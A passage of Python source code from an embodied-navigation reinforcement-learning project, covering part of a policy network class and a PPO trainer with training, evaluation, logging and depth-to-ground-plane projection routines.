goal vector with CNN's output and passes that through RNN.
"""
def __init__(self, agent_type, observation_space, hidden_size, goal_sensor_uuid, device,
object_category_embedding_size, previous_action_embedding_size, use_previous_action
):
super().__init__()
self.agent_type = agent_type
self.goal_sensor_uuid = goal_sensor_uuid
self._n_input_goal = observation_space.spaces[
self.goal_sensor_uuid
].shape[0]
self._hidden_size = hidden_size
self.device = device
self.use_previous_action = use_previous_action
self.visual_encoder = RGBCNNOracle(observation_space, 512)
if agent_type == "oracle":
self.map_encoder = MapCNN(50, 256, agent_type)
self.occupancy_embedding = nn.Embedding(3, 16)
self.object_embedding = nn.Embedding(9, 16)
self.goal_embedding = nn.Embedding(9, object_category_embedding_size)
elif agent_type == "no-map":
self.goal_embedding = nn.Embedding(8, object_category_embedding_size)
elif agent_type == "oracle-ego":
self.map_encoder = MapCNN(50, 256, agent_type)
self.object_embedding = nn.Embedding(10, 16)
self.goal_embedding = nn.Embedding(9, object_category_embedding_size)
self.action_embedding = nn.Embedding(4, previous_action_embedding_size)
if self.use_previous_action:
self.state_encoder = RNNStateEncoder(
(self._hidden_size) + object_category_embedding_size +
previous_action_embedding_size, self._hidden_size,
)
else:
self.state_encoder = RNNStateEncoder(
(self._hidden_size) + object_category_embedding_size,
self._hidden_size, #Replace 2 by number of target categories later
)
self.train()
@property
def output_size(self):
return self._hidden_size
@property
def is_blind(self):
return self.visual_encoder.is_blind
@property
def num_recurrent_layers(self):
return self.state_encoder.num_recurrent_layers
def get_target_encoding(self, observations):
return observations[self.goal_sensor_uuid]
def forward(self, observations, rnn_hidden_states, prev_actions, masks):
target_encoding = self.get_target_encoding(observations)
x = [self.goal_embedding((target_encoding).type(torch.LongTensor).to(self.device)).squeeze(1)]
bs = target_encoding.shape[0]
if not self.is_blind:
perception_embed = self.visual_encoder(observations)
x = [perception_embed] + x
if self.agent_type != "no-map":
global_map_embedding = []
global_map = observations['semMap']
if self.agent_type == "oracle":
global_map_embedding.append(self.occupancy_embedding(global_map[:, :, :, 0].type(torch.LongTensor).to(self.device).view(-1)).view(bs, 50, 50 , -1))
global_map_embedding.append(self.object_embedding(global_map[:, :, :, 1].type(torch.LongTensor).to(self.device).view(-1)).view(bs, 50, 50, -1))
global_map_embedding = torch.cat(global_map_embedding, dim=3)
map_embed = self.map_encoder(global_map_embedding)
x = [map_embed] + x
if self.use_previous_action:
x = torch.cat(x + [self.action_embedding(prev_actions).squeeze(1)], dim=1)
else:
x = torch.cat(x, dim=1)
x, rnn_hidden_states = self.state_encoder(x, rnn_hidden_states, masks)
return x, rnn_hidden_states
```
#### File: rl/ppo/ppo_trainer.py
```python
from habitat_baselines.rl.ppo.ppo import PPONonOracle
import json
import os
import time
from collections import defaultdict, deque
from typing import Any, Dict, List, Optional
from einops import rearrange
import math
import numpy as np
import torch
import torch.nn.functional as F
import torch_scatter
import tqdm
from torch.optim.lr_scheduler import LambdaLR
from habitat import Config, logger
from habitat.utils.visualizations.utils import observations_to_image
from habitat_baselines.common.base_trainer import BaseRLTrainerNonOracle, BaseRLTrainerOracle
from habitat_baselines.common.baseline_registry import baseline_registry
from habitat_baselines.common.env_utils import construct_envs
from habitat_baselines.common.environments import get_env_class
from habitat_baselines.common.rollout_storage import RolloutStorageOracle, RolloutStorageNonOracle
from habitat_baselines.common.tensorboard_utils import TensorboardWriter
from habitat_baselines.common.utils import (
batch_obs,
generate_video,
linear_decay,
)
from habitat_baselines.rl.ppo import PPONonOracle, PPOOracle, BaselinePolicyNonOracle, BaselinePolicyOracle
from habitat.core.vector_env import VectorEnv
@baseline_registry.register_trainer(name="non-oracle")
class PPOTrainerNO(BaseRLTrainerNonOracle):
r"""Trainer class for PPO algorithm
Paper: https://arxiv.org/abs/1707.06347.
"""
supported_tasks = ["Nav-v0"]
def __init__(self, config=None):
super().__init__(config)
self.actor_critic = None
self.agent = None
self.envs = None
if config is not None:
logger.info(f"config: {config}")
self._static_encoder = False
self._encoder = None
def _setup_actor_critic_agent(self, ppo_cfg: Config) -> None:
r"""Sets up actor critic and agent for PPO.
Args:
ppo_cfg: config node with relevant params
Returns:
None
"""
logger.add_filehandler(self.config.LOG_FILE)
if isinstance(self.envs, VectorEnv):
self.actor_critic = BaselinePolicyNonOracle(
batch_size=self.config.NUM_PROCESSES,
observation_space=self.envs.observation_spaces[0],
action_space=self.envs.action_spaces[0],
hidden_size=ppo_cfg.hidden_size,
goal_sensor_uuid=self.config.TASK_CONFIG.TASK.GOAL_SENSOR_UUID,
device=self.device,
object_category_embedding_size=self.config.RL.OBJECT_CATEGORY_EMBEDDING_SIZE,
previous_action_embedding_size=self.config.RL.PREVIOUS_ACTION_EMBEDDING_SIZE,
use_previous_action=self.config.RL.PREVIOUS_ACTION,
egocentric_map_size=self.config.RL.MAPS.egocentric_map_size,
global_map_size=self.config.RL.MAPS.global_map_size,
global_map_depth=self.config.RL.MAPS.global_map_depth,
coordinate_min=self.config.RL.MAPS.coordinate_min,
coordinate_max=self.config.RL.MAPS.coordinate_max
)
else:
self.actor_critic = BaselinePolicyNonOracle(
batch_size=self.config.NUM_PROCESSES,
observation_space=self.envs.observation_space,
action_space=self.envs.action_space,
hidden_size=ppo_cfg.hidden_size,
goal_sensor_uuid=self.config.TASK_CONFIG.TASK.GOAL_SENSOR_UUID,
device=self.device,
object_category_embedding_size=self.config.RL.OBJECT_CATEGORY_EMBEDDING_SIZE,
previous_action_embedding_size=self.config.RL.PREVIOUS_ACTION_EMBEDDING_SIZE,
use_previous_action=self.config.RL.PREVIOUS_ACTION,
egocentric_map_size=self.config.RL.MAPS.egocentric_map_size,
global_map_size=self.config.RL.MAPS.global_map_size,
global_map_depth=self.config.RL.MAPS.global_map_depth,
coordinate_min=self.config.RL.MAPS.coordinate_min,
coordinate_max=self.config.RL.MAPS.coordinate_max
)
self.actor_critic.to(self.device)
self.agent = PPONonOracle(
actor_critic=self.actor_critic,
clip_param=ppo_cfg.clip_param,
ppo_epoch=ppo_cfg.ppo_epoch,
num_mini_batch=ppo_cfg.num_mini_batch,
value_loss_coef=ppo_cfg.value_loss_coef,
entropy_coef=ppo_cfg.entropy_coef,
lr=ppo_cfg.lr,
eps=ppo_cfg.eps,
max_grad_norm=ppo_cfg.max_grad_norm,
use_normalized_advantage=ppo_cfg.use_normalized_advantage,
)
def save_checkpoint(
self, file_name: str, extra_state: Optional[Dict] = None
) -> None:
r"""Save checkpoint with specified name.
Args:
file_name: file name for checkpoint
Returns:
None
"""
checkpoint = {
"state_dict": self.agent.state_dict(),
"config": self.config,
}
if extra_state is not None:
checkpoint["extra_state"] = extra_state
torch.save(
checkpoint, os.path.join(self.config.CHECKPOINT_FOLDER, file_name)
)
def load_checkpoint(self, checkpoint_path: str, *args, **kwargs) -> Dict:
r"""Load checkpoint of specified path as a dict.
Args:
checkpoint_path: path of target checkpoint
*args: additional positional args
**kwargs: additional keyword args
Returns:
dict containing checkpoint info
"""
return torch.load(checkpoint_path, *args, **kwargs)
METRICS_BLACKLIST = {"top_down_map", "collisions.is_collision", "raw_metrics"}
@classmethod
def _extract_scalars_from_info(
cls, info: Dict[str, Any]
) -> Dict[str, float]:
result = {}
for k, v in info.items():
if k in cls.METRICS_BLACKLIST:
continue
if isinstance(v, dict):
result.update(
{
k + "." + subk: subv
for subk, subv in cls._extract_scalars_from_info(
v
).items()
if (k + "." + subk) not in cls.METRICS_BLACKLIST
}
)
# Things that are scalar-like will have an np.size of 1.
# Strings also have an np.size of 1, so explicitly ban those
elif np.size(v) == 1 and not isinstance(v, str):
result[k] = float(v)
return result
@classmethod
def _extract_scalars_from_infos(
cls, infos: List[Dict[str, Any]]
) -> Dict[str, List[float]]:
results = defaultdict(list)
for i in range(len(infos)):
for k, v in cls._extract_scalars_from_info(infos[i]).items():
results[k].append(v)
return results
def _collect_rollout_step(
self, rollouts, current_episode_reward, running_episode_stats
):
pth_time = 0.0
env_time = 0.0
t_sample_action = time.time()
# sample actions
with torch.no_grad():
step_observation = {
k: v[rollouts.step] for k, v in rollouts.observations.items()
}
(
values,
actions,
actions_log_probs,
recurrent_hidden_states,
global_map,
) = self.actor_critic.act(
step_observation,
rollouts.recurrent_hidden_states[rollouts.step],
rollouts.global_map[rollouts.step],
rollouts.prev_actions[rollouts.step],
rollouts.masks[rollouts.step],
)
pth_time += time.time() - t_sample_action
t_step_env = time.time()
outputs = self.envs.step([a[0].item() for a in actions])
observations, rewards, dones, infos = [list(x) for x in zip(*outputs)]
env_time += time.time() - t_step_env
t_update_stats = time.time()
batch = batch_obs(observations, device=self.device)
rewards = torch.tensor(
rewards, dtype=torch.float, device=current_episode_reward.device
)
rewards = rewards.unsqueeze(1)
masks = torch.tensor(
[[0.0] if done else [1.0] for done in dones],
dtype=torch.float,
device=current_episode_reward.device,
)
current_episode_reward += rewards
running_episode_stats["reward"] += (1 - masks) * current_episode_reward
running_episode_stats["count"] += 1 - masks
for k, v in self._extract_scalars_from_infos(infos).items():
v = torch.tensor(
v, dtype=torch.float, device=current_episode_reward.device
).unsqueeze(1)
if k not in running_episode_stats:
running_episode_stats[k] = torch.zeros_like(
running_episode_stats["count"]
)
running_episode_stats[k] += (1 - masks) * v
current_episode_reward *= masks
if self._static_encoder:
with torch.no_grad():
batch["visual_features"] = self._encoder(batch)
rollouts.insert(
batch,
recurrent_hidden_states,
global_map,
actions,
actions_log_probs,
values,
rewards,
masks,
)
pth_time += time.time() - t_update_stats
return pth_time, env_time, self.envs.num_envs
def _update_agent(self, ppo_cfg, rollouts):
t_update_model = time.time()
with torch.no_grad():
last_observation = {
k: v[rollouts.step] for k, v in rollouts.observations.items()
}
next_value = self.actor_critic.get_value(
last_observation,
rollouts.recurrent_hidden_states[rollouts.step],
rollouts.global_map[rollouts.step],
rollouts.prev_actions[rollouts.step],
rollouts.masks[rollouts.step],
).detach()
rollouts.compute_returns(
next_value, ppo_cfg.use_gae, ppo_cfg.gamma, ppo_cfg.tau
)
value_loss, action_loss, dist_entropy = self.agent.update(rollouts)
rollouts.after_update()
return (
time.time() - t_update_model,
value_loss,
action_loss,
dist_entropy,
)
def train(self) -> None:
r"""Main method for training PPO.
Returns:
None
"""
self.envs = construct_envs(
self.config, get_env_class(self.config.ENV_NAME)
)
ppo_cfg = self.config.RL.PPO
self.device = (
torch.device("cuda", self.config.TORCH_GPU_ID)
if torch.cuda.is_available()
else torch.device("cpu")
)
if not os.path.isdir(self.config.CHECKPOINT_FOLDER):
os.makedirs(self.config.CHECKPOINT_FOLDER)
self._setup_actor_critic_agent(ppo_cfg)
logger.info(
"agent number of parameters: {}".format(
sum(param.numel() for param in self.agent.parameters())
)
)
rollouts = RolloutStorageNonOracle(
ppo_cfg.num_steps,
self.envs.num_envs,
self.envs.observation_spaces[0],
self.envs.action_spaces[0],
ppo_cfg.hidden_size,
self.config.RL.MAPS.global_map_size,
self.config.RL.MAPS.global_map_depth,
)
rollouts.to(self.device)
observations = self.envs.reset()
batch = batch_obs(observations, device=self.device)
for sensor in rollouts.observations:
rollouts.observations[sensor][0].copy_(batch[sensor])
# batch and observations may contain shared PyTorch CUDA
# tensors. We must explicitly clear them here otherwise
# they will be kept in memory for the entire duration of training!
batch = None
observations = None
current_episode_reward = torch.zeros(self.envs.num_envs, 1)
running_episode_stats = dict(
count=torch.zeros(self.envs.num_envs, 1),
reward=torch.zeros(self.envs.num_envs, 1),
)
window_episode_stats = defaultdict(
lambda: deque(maxlen=ppo_cfg.reward_window_size)
)
t_start = time.time()
env_time = 0
pth_time = 0
count_steps = 0
count_checkpoints = 0
lr_scheduler = LambdaLR(
optimizer=self.agent.optimizer,
lr_lambda=lambda x: linear_decay(x, self.config.NUM_UPDATES),
)
with TensorboardWriter(
self.config.TENSORBOARD_DIR, flush_secs=self.flush_secs
) as writer:
for update in range(self.config.NUM_UPDATES):
if ppo_cfg.use_linear_lr_decay:
lr_scheduler.step()
if ppo_cfg.use_linear_clip_decay:
self.agent.clip_param = ppo_cfg.clip_param * linear_decay(
update, self.config.NUM_UPDATES
)
for step in range(ppo_cfg.num_steps):
(
delta_pth_time,
delta_env_time,
delta_steps,
) = self._collect_rollout_step(
rollouts, current_episode_reward, running_episode_stats
)
pth_time += delta_pth_time
env_time += delta_env_time
count_steps += delta_steps
(
delta_pth_time,
value_loss,
action_loss,
dist_entropy,
) = self._update_agent(ppo_cfg, rollouts)
pth_time += delta_pth_time
for k, v in running_episode_stats.items():
window_episode_stats[k].append(v.clone())
deltas = {
k: (
(v[-1] - v[0]).sum().item()
if len(v) > 1
else v[0].sum().item()
)
for k, v in window_episode_stats.items()
}
deltas["count"] = max(deltas["count"], 1.0)
writer.add_scalar(
"train/reward", deltas["reward"] / deltas["count"], count_steps
)
writer.add_scalar(
"train/learning_rate", lr_scheduler._last_lr[0], count_steps
)
total_actions = rollouts.actions.shape[0] * rollouts.actions.shape[1]
total_found_actions = int(torch.sum(rollouts.actions == 0).cpu().numpy())
total_forward_actions = int(torch.sum(rollouts.actions == 1).cpu().numpy())
total_left_actions = int(torch.sum(rollouts.actions == 2).cpu().numpy())
total_right_actions = int(torch.sum(rollouts.actions == 3).cpu().numpy())
total_look_up_actions = int(torch.sum(rollouts.actions == 4).cpu().numpy())
total_look_down_actions = int(torch.sum(rollouts.actions == 5).cpu().numpy())
assert total_actions == (total_found_actions + total_forward_actions +
total_left_actions + total_right_actions + total_look_up_actions +
total_look_down_actions
)
# Check later why this assertion is not true
# total_actions = (total_stop_actions + total_forward_actions +
# total_left_actions + total_right_actions + total_look_up_actions +
# total_look_down_actions
# )
writer.add_histogram(
"map_encoder_cnn_0", self.actor_critic.net.map_encoder.cnn[0].weight, count_steps
)
writer.add_histogram(
"map_encoder_cnn_1", self.actor_critic.net.map_encoder.cnn[2].weight, count_steps
)
writer.add_histogram(
"map_encoder_cnn_2", self.actor_critic.net.map_encoder.cnn[4].weight, count_steps
)
writer.add_histogram(
"map_encoder_linear", self.actor_critic.net.map_encoder.cnn[6].weight, count_steps
)
writer.add_histogram(
"visual_encoder_cnn_0", self.actor_critic.net.visual_encoder.cnn[0].weight, count_steps
)
writer.add_histogram(
"visual_encoder_cnn_1", self.actor_critic.net.visual_encoder.cnn[2].weight, count_steps
)
writer.add_histogram(
"visual_encoder_cnn_2", self.actor_critic.net.visual_encoder.cnn[4].weight, count_steps
)
writer.add_histogram(
"visual_encoder_linear", self.actor_critic.net.image_features_linear.weight, count_steps
)
writer.add_scalar(
"train/found_action_prob", total_found_actions/total_actions, count_steps
)
writer.add_scalar(
"train/forward_action_prob", total_forward_actions/total_actions, count_steps
)
writer.add_scalar(
"train/left_action_prob", total_left_actions/total_actions, count_steps
)
writer.add_scalar(
"train/right_action_prob", total_right_actions/total_actions, count_steps
)
writer.add_scalar(
"train/look_up_action_prob", total_look_up_actions/total_actions, count_steps
)
writer.add_scalar(
"train/look_down_action_prob", total_look_down_actions/total_actions, count_steps
)
metrics = {
k: v / deltas["count"]
for k, v in deltas.items()
if k not in {"reward", "count"}
}
if len(metrics) > 0:
writer.add_scalar("metrics/distance_to_currgoal", metrics["distance_to_currgoal"], count_steps)
writer.add_scalar("metrics/success", metrics["success"], count_steps)
writer.add_scalar("metrics/sub_success", metrics["sub_success"], count_steps)
writer.add_scalar("metrics/episode_length", metrics["episode_length"], count_steps)
writer.add_scalar("metrics/distance_to_multi_goal", metrics["distance_to_multi_goal"], count_steps)
writer.add_scalar("metrics/percentage_success", metrics["percentage_success"], count_steps)
writer.add_scalar("train/losses_value", value_loss, count_steps)
writer.add_scalar("train/losses_policy", action_loss, count_steps)
# log stats
if update > 0 and update % self.config.LOG_INTERVAL == 0:
logger.info(
"update: {}\tfps: {:.3f}\t".format(
update, count_steps / (time.time() - t_start)
)
)
logger.info(
"update: {}\tenv-time: {:.3f}s\tpth-time: {:.3f}s\t"
"frames: {}".format(
update, env_time, pth_time, count_steps
)
)
logger.info(
"Average window size: {} {}".format(
len(window_episode_stats["count"]),
" ".join(
"{}: {:.3f}".format(k, v / deltas["count"])
for k, v in deltas.items()
if k != "count"
),
)
)
# checkpoint model
if update % self.config.CHECKPOINT_INTERVAL == 0:
self.save_checkpoint(
f"ckpt.{count_checkpoints}.pth", dict(step=count_steps)
)
count_checkpoints += 1
self.envs.close()
def _eval_checkpoint(
self,
checkpoint_path: str,
writer: TensorboardWriter,
checkpoint_index: int = 0,
) -> None:
r"""Evaluates a single checkpoint.
Args:
checkpoint_path: path of checkpoint
writer: tensorboard writer object for logging to tensorboard
checkpoint_index: index of cur checkpoint for logging
Returns:
None
"""
# Map location CPU is almost always better than mapping to a CUDA device.
ckpt_dict = self.load_checkpoint(checkpoint_path, map_location="cpu")
if self.config.EVAL.USE_CKPT_CONFIG:
config = self._setup_eval_config(ckpt_dict["config"])
else:
config = self.config.clone()
ppo_cfg = config.RL.PPO
map_config = config.RL.MAPS
config.defrost()
config.TASK_CONFIG.DATASET.SPLIT = config.EVAL.SPLIT
config.freeze()
# if len(self.config.VIDEO_OPTION) > 0 and np.random.uniform(0, 1) <= self.config.VIDEO_PROB:
if len(self.config.VIDEO_OPTION) > 0:
config.defrost()
config.TASK_CONFIG.TASK.MEASUREMENTS.append("TOP_DOWN_MAP")
config.TASK_CONFIG.TASK.MEASUREMENTS.append("COLLISIONS")
config.freeze()
logger.info(f"env config: {config}")
self.envs = construct_envs(config, get_env_class(config.ENV_NAME))
self._setup_actor_critic_agent(ppo_cfg)
self.agent.load_state_dict(ckpt_dict["state_dict"])
self.actor_critic = self.agent.actor_critic
observations = self.envs.reset()
batch = batch_obs(observations, device=self.device)
current_episode_reward = torch.zeros(
self.envs.num_envs, 1, device=self.device
)
test_recurrent_hidden_states = torch.zeros(
self.actor_critic.net.num_recurrent_layers,
self.config.NUM_PROCESSES,
ppo_cfg.hidden_size,
device=self.device,
)
test_global_map = torch.zeros(
self.config.NUM_PROCESSES,
self.config.RL.MAPS.global_map_size,
self.config.RL.MAPS.global_map_size,
self.config.RL.MAPS.global_map_depth,
)
test_global_map_visualization = torch.zeros(
self.config.NUM_PROCESSES,
self.config.RL.MAPS.global_map_size,
self.config.RL.MAPS.global_map_size,
3,
)
prev_actions = torch.zeros(
self.config.NUM_PROCESSES, 1, device=self.device, dtype=torch.long
)
not_done_masks = torch.zeros(
self.config.NUM_PROCESSES, 1, device=self.device
)
stats_episodes = dict() # dict of dicts that stores stats per episode
raw_metrics_episodes = dict()
rgb_frames = [
[] for _ in range(self.config.NUM_PROCESSES)
] # type: List[List[np.ndarray]]
if len(self.config.VIDEO_OPTION) > 0:
os.makedirs(self.config.VIDEO_DIR, exist_ok=True)
pbar = tqdm.tqdm(total=self.config.TEST_EPISODE_COUNT)
self.actor_critic.eval()
while (
len(stats_episodes) < self.config.TEST_EPISODE_COUNT
and self.envs.num_envs > 0
):
current_episodes = self.envs.current_episodes()
with torch.no_grad():
(
_,
actions,
_,
test_recurrent_hidden_states,
test_global_map,
) = self.actor_critic.act(
batch,
test_recurrent_hidden_states,
test_global_map,
prev_actions,
not_done_masks,
deterministic=False,
)
prev_actions.copy_(actions)
outputs = self.envs.step([a[0].item() for a in actions])
observations, rewards, dones, infos = [
list(x) for x in zip(*outputs)
]
batch = batch_obs(observations, device=self.device)
not_done_masks = torch.tensor(
[[0.0] if done else [1.0] for done in dones],
dtype=torch.float,
device=self.device,
)
# Reset global map
#test_global_map_visualization = not_done_masks.unsqueeze(2).unsqueeze(3).cpu() * test_global_map_visualization
rewards = torch.tensor(
rewards, dtype=torch.float, device=self.device
).unsqueeze(1)
current_episode_reward += rewards
next_episodes = self.envs.current_episodes()
envs_to_pause = []
n_envs = self.envs.num_envs
for i in range(n_envs):
if (
next_episodes[i].scene_id,
next_episodes[i].episode_id,
) in stats_episodes:
envs_to_pause.append(i)
# episode ended
if not_done_masks[i].item() == 0:
pbar.update()
episode_stats = dict()
episode_stats["reward"] = current_episode_reward[i].item()
episode_stats.update(
self._extract_scalars_from_info(infos[i])
)
current_episode_reward[i] = 0
# use scene_id + episode_id as unique id for storing stats
stats_episodes[
(
current_episodes[i].scene_id,
current_episodes[i].episode_id,
)
] = episode_stats
if 'RAW_METRICS' in config.TASK_CONFIG.TASK.MEASUREMENTS:
raw_metrics_episodes[
current_episodes[i].scene_id + '.' +
current_episodes[i].episode_id
] = infos[i]["raw_metrics"]
if len(self.config.VIDEO_OPTION) > 0:
generate_video(
video_option=self.config.VIDEO_OPTION,
video_dir=self.config.VIDEO_DIR,
images=rgb_frames[i],
episode_id=current_episodes[i].episode_id,
checkpoint_idx=checkpoint_index,
metrics=self._extract_scalars_from_info(infos[i]),
tb_writer=writer,
)
rgb_frames[i] = []
# episode continues
elif len(self.config.VIDEO_OPTION) > 0:
grid_x, grid_y = to_grid(
map_config.coordinate_min,
map_config.coordinate_max,
map_config.global_map_size,
observations[i]['gps']
)
projection1 = draw_projection(observations[i]['rgb'], observations[i]['depth'] * 10, map_config.egocentric_map_size, map_config.global_map_size, map_config.coordinate_min, map_config.coordinate_max)
projection1 = projection1.squeeze(0).squeeze(0).permute(1, 2, 0)
projection1 = rotate_tensor(projection1.permute(2, 0, 1).unsqueeze(0), torch.tensor(-(observations[i]["compass"])).unsqueeze(0))
projection1 = projection1.squeeze(0).permute(1, 2, 0)
s = map_config.egocentric_map_size
#temp = torch.max(test_global_map_visualization[i][grid_x - math.floor(s/2):grid_x + math.ceil(s/2),grid_y - math.floor(s/2):grid_y + math.ceil(s/2),:], projection1)
#test_global_map_visualization[i][grid_x - math.floor(s/2):grid_x + math.ceil(s/2),grid_y - math.floor(s/2):grid_y + math.ceil(s/2),:] = temp
#global_map1 = rotate_tensor(test_global_map_visualization[i][grid_x - math.floor(51/2):grid_x + math.ceil(51/2),grid_y - math.floor(51/2):grid_y + math.ceil(51/2),:].permute(2, 1, 0).unsqueeze(0), torch.tensor(-(observations[i]["compass"])).unsqueeze(0)).squeeze(0).permute(1, 2, 0).numpy()
egocentric_map = torch.sum(test_global_map[i, grid_x - math.floor(51/2):grid_x+math.ceil(51/2), grid_y - math.floor(51/2):grid_y + math.ceil(51/2),:], dim=2)
frame = observations_to_image(observations[i], infos[i], actions[i].cpu().numpy())
rgb_frames[i].append(frame)
(
self.envs,
test_recurrent_hidden_states,
test_global_map,
not_done_masks,
current_episode_reward,
prev_actions,
batch,
rgb_frames,
) = self._pause_envs(
envs_to_pause,
self.envs,
test_recurrent_hidden_states,
test_global_map,
not_done_masks,
current_episode_reward,
prev_actions,
batch,
rgb_frames,
)
num_episodes = len(stats_episodes)
aggregated_stats = dict()
for stat_key in next(iter(stats_episodes.values())).keys():
aggregated_stats[stat_key] = (
sum([v[stat_key] for v in stats_episodes.values()])
/ num_episodes
)
for k, v in aggregated_stats.items():
logger.info(f"Average episode {k}: {v:.4f}")
step_id = checkpoint_index
if "extra_state" in ckpt_dict and "step" in ckpt_dict["extra_state"]:
step_id = ckpt_dict["extra_state"]["step"]
writer.add_scalar("eval/average_reward", aggregated_stats["reward"],
step_id,
)
metrics = {k: v for k, v in aggregated_stats.items() if k != "reward"}
writer.add_scalar("eval/distance_to_currgoal", metrics["distance_to_currgoal"], step_id)
writer.add_scalar("eval/distance_to_multi_goal", metrics["distance_to_multi_goal"], step_id)
writer.add_scalar("eval/episode_length", metrics["episode_length"], step_id)
writer.add_scalar("eval/mspl", metrics["mspl"], step_id)
writer.add_scalar("eval/pspl", metrics["pspl"], step_id)
writer.add_scalar("eval/percentage_success", metrics["percentage_success"], step_id)
writer.add_scalar("eval/success", metrics["success"], step_id)
writer.add_scalar("eval/sub_success", metrics["sub_success"], step_id)
##Dump metrics JSON
if 'RAW_METRICS' in config.TASK_CONFIG.TASK.MEASUREMENTS:
if not os.path.exists(config.TENSORBOARD_DIR_EVAL +'/metrics'):
os.mkdir(config.TENSORBOARD_DIR_EVAL +'/metrics')
with open(config.TENSORBOARD_DIR_EVAL +'/metrics/' + checkpoint_path.split('/')[-1] + '.json', 'w') as fp:
json.dump(raw_metrics_episodes, fp)
self.envs.close()
def to_grid(coordinate_min, coordinate_max, global_map_size, position):
grid_size = (coordinate_max - coordinate_min) / global_map_size
grid_x = ((coordinate_max - position[0]) / grid_size).round()
grid_y = ((position[1] - coordinate_min) / grid_size).round()
return int(grid_x), int(grid_y)
def draw_projection(image, depth, s, global_map_size, coordinate_min, coordinate_max):
image = torch.tensor(image).permute(2, 0, 1).unsqueeze(0)
depth = torch.tensor(depth).permute(2, 0, 1).unsqueeze(0)
spatial_locs, valid_inputs = _compute_spatial_locs(depth, s, global_map_size, coordinate_min, coordinate_max)
x_gp1 = _project_to_ground_plane(image, spatial_locs, valid_inputs, s)
return x_gp1
def _project_to_ground_plane(img_feats, spatial_locs, valid_inputs, s):
outh, outw = (s, s)
bs, f, HbyK, WbyK = img_feats.shape
device = img_feats.device
eps=-1e16
K = 1
# Sub-sample spatial_locs, valid_inputs according to img_feats resolution.
idxes_ss = ((torch.arange(0, HbyK, 1)*K).long().to(device), \
(torch.arange(0, WbyK, 1)*K).long().to(device))
spatial_locs_ss = spatial_locs[:, :, idxes_ss[0][:, None], idxes_ss[1]] # (bs, 2, HbyK, WbyK)
valid_inputs_ss = valid_inputs[:, :, idxes_ss[0][:, None], idxes_ss[1]] # (bs, 1, HbyK, WbyK)
valid_inputs_ss = valid_inputs_ss.squeeze(1) # (bs, HbyK, WbyK)
invalid_inputs_ss = ~valid_inputs_ss
# Filter out invalid spatial locations
invalid_spatial_locs = (spatial_locs_ss[:, 1] >= outh) | (spatial_locs_ss[:, 1] < 0 ) | \
(spatial_locs_ss[:, 0] >= outw) | (spatial_locs_ss[:, 0] < 0 ) # (bs, H, W)
invalid_writes = invalid_spatial_locs | invalid_inputs_ss
# Set the idxes for all invalid locations to (0, 0)
spatial_locs_ss[:, 0][invalid_writes] = 0
spatial_locs_ss[:, 1][invalid_writes] = 0
# Weird hack to account for max-pooling negative feature values
invalid_writes_f = rearrange(invalid_writes, 'b h w -> b () h w').float()
img_feats_masked = img_feats * (1 - invalid_writes_f) + eps * invalid_writes_f
img_feats_masked = rearrange(img_feats_masked, 'b e h w -> b e (h w)')
# Linearize ground-plane indices (linear idx = y * W + x)
linear_locs_ss = spatial_locs_ss[:, 1] * outw + spatial_locs_ss[:, 0] # (bs, H, W)
linear_locs_ss = rearrange(linear_locs_ss, 'b h w -> b () (h w)')
linear_locs_ss = linear_locs_ss.expand(-1, f, -1) # .contiguous()
proj_feats, _ = torch_scatter.scatter_max(
img_feats_masked,
linear_locs_ss,
dim=2,
dim_size=outh*outw,
)
proj_feats = rearrange(proj_feats, 'b e (h w) -> b e h w', h=outh)
# Replace invalid features with zeros
eps_mask = (proj_feats == eps).float()
proj_feats = proj_feats * (1 - eps_mask) + eps_mask * (proj_feats - eps)
return proj_feats
def _compute_spatial_locs(depth_inputs, s, global_map_size, coordinate_min, coordinate_max):
bs, _, imh, imw = depth_inputs.shape
local_scale = float(coordinate_max - coordinate_min)/float(global_map_size)
cx, cy = 256./2., 256./2.
fx = fy = (256. / 2.) / np.tan(np.deg2rad(79. / 2.))
#2D image coordinates
x = rearrange(torch.arange(0, imw), 'w -> () () () w')
y = rearrange(torch.arange(imh, 0, step=-1), 'h -> () () h ()')
xx = (x - cx) / fx
yy = (y - cy) / fy
# 3D real-world coordinates (in meters)
Z = depth_inputs
X = xx * Z
Y = yy * Z
# valid_inputs = (depth_inputs != 0) & ((Y < 1) & (Y > -1))
valid_inputs = (depth_inputs != 0) & ((Y > -0.5) & (Y < 1))
# 2D ground projection coordinates (in meters)
# Note: map_scale - dimension of each grid in meters
# - depth/scale + (s-1)/2 since image convention is image y downward
# and agent is facing upwards.
x_gp = ( (X / local_scale) + (s-1)/2).round().long() # (bs, 1, imh, imw)
y_gp = (-(Z / local_scale) + (s-1)/2).round().long() # (bs, 1, imh, imw)
return torch.cat([x_gp, y_gp], dim=1), valid_inputs
def rotate_tensor(x_gp, heading):
sin_t = torch.sin(heading.squeeze(1))
cos_t = torch.cos(heading.squeeze(1))
A = torch.zeros(x_gp.size(0), 2, 3)
A[:, 0, 0] = cos_t
A[:, 0, 1] = sin_t
A[:, 1, 0] = -sin_t
A[:, 1, 1] = cos_t
grid = F.affine_grid(A, x_gp.size())
rotated_x_gp = F.grid_sample(x_gp, grid)
return rotated_x_gp
@baseline_registry.register_trainer(name="oracle")
class PPOTrainerO(BaseRLTrainerOracle):
r"""Trainer class for PPO algorithm
Paper: https://arxiv.org/abs/1707.06347.
"""
supported_tasks = ["Nav-v0"]
def __init__(self, config=None):
super().__init__(config)
self.actor_critic = None
self.agent = None
self.envs = None
if config is not None:
logger.info(f"config: {config}")
self._static_encoder = False
self._encoder = None
# with open('mapDictFull.pickle', 'rb') as handle:
# self.mapCache = pickle.load(handle)
def _setup_actor_critic_agent(self, ppo_cfg: Config) -> None:
r"""Sets up actor critic and agent for PPO.
Args:
ppo_cfg: config node with relevant params
Returns:
None
"""
logger.add_filehandler(self.config.LOG_FILE)
if isinstance(self.envs, VectorEnv):
self.actor_critic = BaselinePolicyOracle(
agent_type = self.config.TRAINER_NAME,
observation_space=self.envs.observation_spaces[0],
action_space=self.envs.action_spaces[0],
hidden_size=ppo_cfg.hidden_size,
goal_sensor_uuid=self.config.TASK_CONFIG.TASK.GOAL_SENSOR_UUID,
device=self.device,
object_category_embedding_size=self.config.RL.OBJECT_CATEGORY_EMBEDDING_SIZE,
previous_action_embedding_size=self.config.RL.PREVIOUS_ACTION_EMBEDDING_SIZE,
use_previous_action=self.config.RL.PREVIOUS_ACTION
)
else:
self.actor_critic = BaselinePolicyOracle(
agent_type = self.config.TRAINER_NAME,
observation_space=self.envs.observation_space,
action_space=self.envs.action_space,
hidden_size=ppo_cfg.hidden_size,
